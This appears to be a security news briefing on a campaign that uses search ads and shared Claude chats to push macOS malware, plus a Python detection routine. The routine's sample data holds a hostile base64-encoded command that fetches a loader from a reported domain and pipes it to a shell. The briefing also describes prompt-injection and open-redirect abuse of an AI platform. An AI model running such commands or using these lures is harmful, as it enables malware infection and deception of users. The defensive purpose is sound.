What happened
Security reporting describes a malvertising campaign that leverages paid Google Search results and publicly shared Claude chats to distribute macOS malware. According to BleepingComputer, researcher Berk Albayrak shared findings on LinkedIn on May 10 identifying a shared Claude chat that posed as an official "Claude Code on Mac" installation guide and instructed users to paste a Terminal command that silently fetched and ran code (BleepingComputer). ITSecurityNews reports that the same campaign distributes a variant associated with MacSync (ITSecurityNews). Hackread's coverage of Oasis Security research, framed as "Claudy Day," describes techniques for embedding hidden instructions and abusing open redirects on claude.ai to get malicious links approved as ads (Hackread).
Technical details
BleepingComputer documented that the shared chat content included base64-encoded commands that retrieve a loader.sh script from domains such as hxxp://customroofingcontractors[.]com and hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=... (BleepingComputer). The observed loader.sh is a gzip-compressed shell script (unpacked with gunzip at runtime) that runs primarily in memory, reducing on-disk artifacts; the reporting also notes that the server returned uniquely obfuscated payload contents on each request to evade signature-based detection (BleepingComputer). BleepingComputer further observed behavioral checks in one variant, including a keyboard-layout check that avoids victims in Russia and the CIS region (BleepingComputer).
Editorial analysis - technical context
Attack chains that combine malvertising with prefilled or shared AI chat content exploit two trust vectors: search-ad ranking and the perceived legitimacy of platform-hosted artifacts. For practitioners, in-memory compressed loaders and per-request obfuscation increase the value of runtime detection and network telemetry over static file scanning.
Context and significance
Industry reporting highlights two complementary enablers for this campaign. First, paid Google Search ads can point users to domains that mimic legitimate services; BleepingComputer documents sponsored search results for queries like "Claude mac download" linking to malicious instructions (BleepingComputer). Second, Oasis Security research summarized by Hackread shows how hidden prompt injection and open-redirect patterns can be chained to make malicious content appear to originate from claude.ai and bypass user suspicion (Hackread). Together, these factors let attackers craft highly credible social engineering content that leads to single-command execution on macOS.
What to watch
Observers should track:
- takedown actions or statements from Anthropic or Google regarding abused shared-chat links and ad approvals
- additional indicators of compromise tied to MacSync variants and the domains cited in reporting
- research on mitigations for hidden prompt injection and open-redirect abuse in public AI assistant artifacts
For practitioners
Monitor DNS and outbound connections to the domains named in reporting, instrument Terminal command launches and child process creation on macOS endpoints, and prioritize runtime telemetry that can detect compressed, in-memory shell stages and per-request payload obfuscation.
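As an added illustration of the runtime checks above (not code from the reporting or from any vendor), the following Python triage routine scores constructed macOS process-creation records for the stages the reporting describes: a base64-decoded command, a fetch of loader.sh, a gunzip stage piped into a shell, and references to the reported domains. The record shape, field names and sample lines are assumptions.

```python
import base64
import re
from collections import namedtuple

# Domains named in the reporting; matching normalizes the "[.]" defanging.
REPORTED_DOMAINS = {"customroofingcontractors.com", "bernasibutuwqu2.com"}

# Stages the reporting describes: base64-decoded command, loader.sh fetch, gunzip piped to a shell.
STAGE_PATTERNS = {
    "base64_decode": re.compile(r"base64\s+(-d|--decode|-D)\b"),
    "remote_fetch": re.compile(r"\b(curl|wget)\b.*loader\.sh"),
    "inmem_gunzip_shell": re.compile(r"(gunzip|gzip\s+-d|zcat).*\|\s*(sh|bash|zsh)\b"),
}

# One process-creation record (assumed shape): parent image, child image, full command line.
ProcessEvent = namedtuple("ProcessEvent", "parent image cmdline")

def decode_inline_base64(cmdline):
    """Decode base64 blobs in a command line so stages hidden inside them
    can be matched too; non-UTF-8 or non-printable results are ignored."""
    decoded = []
    for blob in re.findall(r"[A-Za-z0-9+/]{24,}={0,2}", cmdline):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except Exception:
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded

def assess_event(ev):
    """Return sorted findings for one event: matched stages, any reported
    domain in the visible or decoded command line, and a Terminal parent."""
    findings = set()
    for text in [ev.cmdline] + decode_inline_base64(ev.cmdline):
        text = text.replace("[.]", ".")
        findings.update(n for n, p in STAGE_PATTERNS.items() if p.search(text))
        findings.update("reported_domain:" + d for d in REPORTED_DOMAINS if d in text)
    if ev.parent == "Terminal" and findings:
        findings.add("terminal_spawned")
    return sorted(findings)

# Constructed sample events (not from the reporting), shaped like an EDR process feed.
SAMPLE_EVENTS = [
    ProcessEvent("Terminal", "bash", "echo " + base64.b64encode(
        b"curl -fsSL hxxp://customroofingcontractors[.]com/loader.sh | gunzip | sh"
    ).decode() + " | base64 -d | sh"),
    ProcessEvent("Terminal", "bash", "ls -la ~/Downloads"),
    ProcessEvent("launchd", "curl", "curl -fsSL https://example.com/update.json"),
]
```

Because the obfuscated payload differs per request, the detection keys on the stage structure and parent process rather than on any file hash.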
Key Points
1. Attackers combine paid Google Search ads and publicly shared Claude chats to increase credibility and lure macOS users into running commands.
2. Observed loader scripts run compressed and largely in memory with per-request obfuscation, reducing the effectiveness of static detection.
3. Research on "Claudy Day" shows that hidden prompt injection and open-redirect abuse can make malicious chat links appear authentic to users and ad platforms.
Scoring Rationale
The campaign uses widely trusted channels (search ads and public AI chat artifacts) to deliver a macOS infostealer, increasing operational credibility and detection difficulty. It is notable for defenders but not a paradigm-shifting vulnerability.